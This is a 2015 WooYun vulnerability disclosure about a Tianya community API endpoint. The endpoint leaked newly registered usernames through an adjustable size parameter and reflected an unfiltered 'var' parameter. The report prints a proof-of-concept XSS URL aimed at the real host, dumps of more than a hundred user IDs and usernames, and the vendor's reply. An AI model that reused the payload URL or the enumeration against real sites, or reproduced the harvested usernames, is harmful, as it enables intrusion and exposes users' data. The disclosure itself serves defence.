当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127457

漏洞标题:天涯社区某API接口泄露上万用户名+XSS

相关厂商:天涯社区

漏洞作者: 0x 80

提交时间:2015-07-20 11:08

修复时间:2015-09-04 09:58

公开时间:2015-09-04 09:58

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

天涯社区某API接口泄露上万用户名+XSS

详细说明:

http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var=

357.png


var = {"code":"1","success":1,"message":"","data":[{"userId":103955430,"userName":"jianxrs"},{"userId":103955429,"userName":"u_103955429"},{"userId":103955428,"userName":"u_103955428"},{"userId":103955427,"userName":"思愆滔"},{"userId":103955426,"userName":"jingxrajiq"},{"userId":103955425,"userName":"鲜嫩矮小"},{"userId":103955424,"userName":"heymans4"},{"userId":103955423,"userName":"螺水市梦"},{"userId":103955422,"userName":"u_103955422"},{"userId":103955421,"userName":"u_103955421"},{"userId":103955420,"userName":"概钻可以"},{"userId":103955419,"userName":"liaktij"},{"userId":103955418,"userName":"叶翠莲"},{"userId":103955417,"userName":"三门听"},{"userId":103955416,"userName":"盐文辞思"},{"userId":103955415,"userName":"cangvbrphw"},{"userId":103955414,"userName":"娇美祸"},{"userId":103955413,"userName":"景火敏"},{"userId":103955412,"userName":"gegfpa"},{"userId":103955411,"userName":"风雨行路人丶"},{"userId":103955410,"userName":"飞雪无痕2015"},{"userId":103955409,"userName":"拥有思维"},{"userId":103955408,"userName":"零落脑另范"},{"userId":103955407,"userName":"肢类南北"},{"userId":103955406,"userName":"法规和家人"},{"userId":103955405,"userName":"shuanuob"},{"userId":103955404,"userName":"u_103955404"},{"userId":103955403,"userName":"gudanfengzhan"},{"userId":103955402,"userName":"u_103955402"},{"userId":103955401,"userName":"u_103955401"},{"userId":103955400,"userName":"讽白翠只"},{"userId":103955399,"userName":"绪思齐依"},{"userId":103955398,"userName":"u_103955398"},{"userId":103955397,"userName":"fengdajo"},{"userId":103955396,"userName":"u_103955396"},{"userId":103955395,"userName":"u_103955395"},{"userId":103955394,"userName":"岳若蕾"},{"userId":103955393,"userName":"僻静歼"},{"userId":103955392,"userName":"u_103955392"},{"userId":103955391,"userName":"kaorkixbd"},{"userId":103955390,"userName":"u_103955390"},{"userId":103955389,"userName":"quzhiqiumiao"},{"userId":103955388,"userName":"niaoktbr"},{"userId":103955387,"userName":"单薄通红"},{"userId":103955386,"userName":"chuangbaq"},{"userId":103955385,"userName":"123321000520520"},{"userId":103955384,"userName":"888999asd"},{"userId":103955383,"userName":"惊吓准化他"},{"userId":103955382,"userName":"傲血2015"},{"userId":103955381,"userName":"纵拐朝夕"},{"userId":103955380,"userName":"u_103955380"},{"userId":103955379,"userName":"孤单俩"},{"userId":103955378,"userName":"u_103955378"},{"userId":103955377,"userName":"qiongrvwelf"}]}


其中size=未加密,替换,可查询到其他的用户名
http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=

546.png


var = {"code":"1","success":1,"message":"","data":[{"userId":103955605,"userName":"趋思绎文"},{"userId":103955604,"userName":"fumoshuangchu"},{"userId":103955603,"userName":"流流西"},{"userId":103955602,"userName":"u_103955602"},{"userId":103955601,"userName":"第二十七年夏至"},{"userId":103955600,"userName":"bapzkn"},{"userId":103955599,"userName":"哀怨铲晨酱"},{"userId":103955598,"userName":"fenobmaab"},{"userId":103955597,"userName":"guiklprs"},{"userId":103955596,"userName":"纤手丽人总汇"},{"userId":103955595,"userName":"jianlhvg"},{"userId":103955594,"userName":"pangrraft"},{"userId":103955593,"userName":"u_103955593"},{"userId":103955592,"userName":"一颗小橙子子子"},{"userId":103955591,"userName":"贝敌屈党"},{"userId":103955590,"userName":"静谧思维"},{"userId":103955589,"userName":"唐以波"},{"userId":103955588,"userName":"花雅巧"},{"userId":103955587,"userName":"siyuanshisang"},{"userId":103955586,"userName":"huodatruw"},{"userId":103955585,"userName":"触水深担"},{"userId":103955584,"userName":"领逝木铎金声"},{"userId":103955583,"userName":"jiangnmwwa"},{"userId":103955582,"userName":"搜索附"},{"userId":103955581,"userName":"宁静剖忌隶"},{"userId":103955580,"userName":"daojoab"},{"userId":103955579,"userName":"u_103955579"},{"userId":103955578,"userName":"雀内拢毁"},{"userId":103955577,"userName":"彼此扁平"},{"userId":103955576,"userName":"分生木偶"},{"userId":103955575,"userName":"灵魂独舞2015"},{"userId":103955574,"userName":"danweiluoqiao"},{"userId":103955573,"userName":"qiawypaw"},{"userId":103955572,"userName":"仙赋寻"},{"userId":103955571,"userName":"可以将"},{"userId":103955570,"userName":"果果的天蓝蓝"},{"userId":103955569,"userName":"u_103955569"},{"userId":103955568,"userName":"u_103955568"},{"userId":103955567,"userName":"weigjxbd"},{"userId":103955566,"userName":"u_103955566"},{"userId":103955565,"userName":"u_103955565"},{"userId":103955564,"userName":"尼西贝贝"},{"userId":103955563,"userName":"hansmqgcr"},{"userId":103955562,"userName":"单音役"},{"userId":103955561,"userName":"ninglianjingb"},{"userId":103955560,"userName":"诿唤站幌"},{"userId":103955559,"userName":"u_103955559"},{"userId":103955558,"userName":"zhiavvq"},{"userId":103955557,"userName":"左右羞花"},{"userId":103955556,"userName":"tongqaavm"},{"userId":103955555,"userName":"u_103955555"},{"userId":103955554,"userName":"xinggujm"},{"userId":103955553,"userName":"dfg546tfgb"},{"userId":103955552,"userName":"尊秆思齐"},{"userId":103955551,"userName":"siyulingzhi


其中VAR参数未过滤,导致触发XSS

237.png


http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=%3Cscript%3Ealert%28/xss/%29%3C/script%3E

漏洞证明:

http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var=


修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-21 09:57

厂商回复:

天涯的用户名本身就是公开的,因此不存在泄露之说,但依然感谢漏洞发布者的提醒,我们已经调整了相关接口,限制了size大小,并对“< >”符号进行了过滤

最新状态:

暂无